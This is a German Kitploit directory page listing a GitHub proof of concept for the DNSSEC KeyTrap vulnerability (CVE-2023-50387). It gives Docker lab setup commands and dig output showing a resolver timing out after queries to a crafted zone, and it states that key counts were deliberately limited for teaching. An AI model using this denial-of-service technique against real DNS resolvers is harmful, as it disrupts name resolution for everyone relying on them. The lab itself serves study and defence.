Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-50387 — Lehrreicher Proof-of-Concept für die DNSSEC-KeyTrap-Schwachstelle (CVE-2023-50387) mit einer Docker-basierten Laborumgebung zur Demonstration von Algorithmus-Komplexitätsangriffen auf DNS-Resolver. | Kitploit
Tools/GitHubGitHub/knqyf263/cve-2023-50387
SchwachstellenanalyseExploitationNetzwerksicherheitLernen & BildungDNS-AnalyseLabs & Praxis
GitHubknqyf263/cve-2023-50387

CVE-2023-50387

Lehrreicher Proof-of-Concept für die DNSSEC-KeyTrap-Schwachstelle (CVE-2023-50387) mit einer Docker-basierten Laborumgebung zur Demonstration von Algorithmus-Komplexitätsangriffen auf DNS-Resolver.

Repository anzeigen
451011vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-50387

KeyTrap in DNS (CVE-2023-50387)

Dieses Repository dient zu Bildungszwecken. Die Anzahl der Schlüssel und Signaturen wurde absichtlich niedrig gehalten, um deren Verwendung in echten Angriffen zu verhindern, und ein Skript zum Erzeugen kollidierender Schlüssel ist nicht enthalten.

Test

netzwerk

Einrichten der PoC-Umgebung

$ docker compose up --build

Bestätigen, dass DNSSEC funktioniert

$ docker compose exec -it attacker dig @10.10.0.3 a.a.test

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44249
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;a.a.test.                      IN      A

;; ANSWER SECTION:
a.a.test.               86400   IN      A       10.10.0.4

;; Query time: 30 msec
;; SERVER: 10.10.0.3#53(10.10.0.3) (UDP)
;; WHEN: Sun Feb 18 22:01:01 UTC 2024
;; MSG SIZE  rcvd: 53

Auslösen von KeyTrap

$ docker compose exec -it attacker dig @10.10.0.3 www.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 www.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached
$ docker compose exec -it attacker dig @10.10.0.3 b.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached

Referenzen

  • https://www.athene-center.de/en/keytrap
Tool herunterladen